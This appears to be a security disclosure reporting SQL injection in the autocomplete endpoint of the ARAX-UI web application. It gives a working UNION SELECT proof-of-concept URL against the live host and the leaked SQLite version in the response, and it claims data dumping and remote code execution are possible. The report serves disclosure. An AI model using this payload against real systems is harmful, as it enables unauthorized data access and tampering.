The /rtxcomplete/nodeslike
endpoint in the ARAX-UI application at https://arax.rtx.ai is vulnerable to SQL injection. It is possible to include a malicious SQL payload in the word
query parameter for this endpoint that would allow an attacker to dump the database, make modifications to data, or delete data. In addition it is possible to completely takeover the server where the application is hosted, by performing remote code execution via this vulnerability.
Perform a GET request to:
https://arax.rtx.ai/rtxcomplete/nodeslike?word=test\" UNION SELECT sqlite_version()---&limit=15&callback=jQuery33105838363973705006_1650064361901&_=1650064362018
The server will return JSON in the HTTP response, with the SQLite version as “3.11.0” as part of the first item in the array:
jQuery33105838363973705006_1650064361901([{"curie": "??", "name": "3.11.0", "type": "??"}, {"curie": "??", "name": "Testa-C", "type": "??"}, {"curie": "??", "name": "testacea group", "type": "??"}, {"curie": "??", "name": "Testacella", "type": "??"}, {"curie": "??", "name": "Testacella haliotidea", "type": "??"}, {"curie": "??", "name": "Testacella maugei", "type": "??"}, {"curie": "??", "name": "Testacella scutulum", "type": "??"}, {"curie": "??", "name": "Testacella sp. NMW.Z", "type": "??"}, {"curie": "??", "name": "Testacellidae", "type": "??"}, {"curie": "??", "name": "testase 4, human", "type": "??"}, {"curie": "??", "name": "Testate", "type": "??"}, {"curie": "??", "name": "Testechiniscus", "type": "??"}, {"curie": "??", "name": "Testechiniscus spitsbergensis", "type": "??"}, {"curie": "??", "name": "tested for", "type": "??"}, {"curie": "??", "name": "Tested for HIV", "type": "??"}]);